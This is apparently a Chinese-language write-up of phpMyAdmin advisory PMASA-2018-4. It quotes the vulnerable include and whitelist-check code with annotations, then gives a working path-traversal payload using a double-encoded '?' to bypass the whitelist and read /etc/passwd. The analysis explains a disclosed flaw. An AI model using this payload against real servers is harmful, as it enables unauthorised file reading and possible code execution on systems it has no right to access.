网址:
https://www.phpmyadmin.net/security/PMASA-2018-4/
文件包含和远程执行代码攻击
发现了一个漏洞,攻击者可以在该漏洞中包含(查看并可能执行)服务器上的文件。
该漏洞来自代码的一部分,其中页面在phpMyAdmin中重定向和加载,以及对白名单页面的不正确测试。
除以下情况外,必须对攻击者进行身份验证:
mb_strpos
的解读查找字符串在另一个字符串中首次出现的位置
// If we have a valid target, let's load that script instead
if (! empty($_REQUEST['target'])//传入的target不能为空
&& is_string($_REQUEST['target'])//target传入的是字符串
&& ! preg_match('/^index/', $_REQUEST['target'])//不能以index开头
&& ! in_array($_REQUEST['target'], $target_blacklist)//target传入参数不能再黑名单数组中
&& Core::checkPageValidity($_REQUEST['target'])) {//经过checkPageValidity检查为真
include $_REQUEST['target'];
exit;}
$target_blacklist = array (
'import.php', 'export.php');
不要让target等于这两个值就可以
public static function checkPageValidity(&$page, array $whitelist = [])
{
if (empty($whitelist)) {
$whitelist = self::$goto_whitelist;//如果$whitelist为空就引用静态声明的goto_whitelist
}
if (! isset($page) || !is_string($page)) {
return false;//如果$page没有被定义过或者$page不为字符串则return false
}
if (in_array($page, $whitelist)) {
return true;//如果$page在白名单里就return true
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')//$_page='?'前的$page
);
if (in_array($_page, $whitelist)) {
return true;//$_page存在$whitelist中的某个值则返回true
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);//解码后$_page='解码后?'前的$page
if (in_array($_page, $whitelist)) {
return true;
}
return false;
}
public static $goto_whitelist = array(
'db_datadict.php',
'db_sql.php',
'db_events.php',
'db_export.php',
'db_importdocsql.php',
'db_multi_table_query.php',
'db_structure.php',
'db_import.php',
'db_operations.php',
'db_search.php',
'db_routines.php',
'export.php',
'import.php',
'index.php',
'pdf_pages.php',
'pdf_schema.php',
'server_binlog.php',
'server_collations.php',
'server_databases.php',
'server_engines.php',
'server_export.php',
'server_import.php',
'server_privileges.php',
'server_sql.php',
'server_status.php',
'server_status_advisor.php',
'server_status_monitor.php',
'server_status_queries.php',
'server_status_variables.php',
'server_variables.php',
'sql.php',
'tbl_addfield.php',
'tbl_change.php',
'tbl_create.php',
'tbl_import.php',
'tbl_indexes.php',
'tbl_sql.php',
'tbl_export.php',
'tbl_operations.php',
'tbl_structure.php',
'tbl_relation.php',
'tbl_replace.php',
'tbl_row_action.php',
'tbl_select.php',
'tbl_zoom_select.php',
'transformation_overview.php',
'transformation_wrapper.php',
'user_password.php',
);
故可以构造target=db_datadict.php%253f/../../../../../../../../etc/passwd(%253f可换为%3f,区别在在第几个判断中return true)
来满足所有判断条件,并进行文件读取
$_page
为db_datadict.php,在白名单中.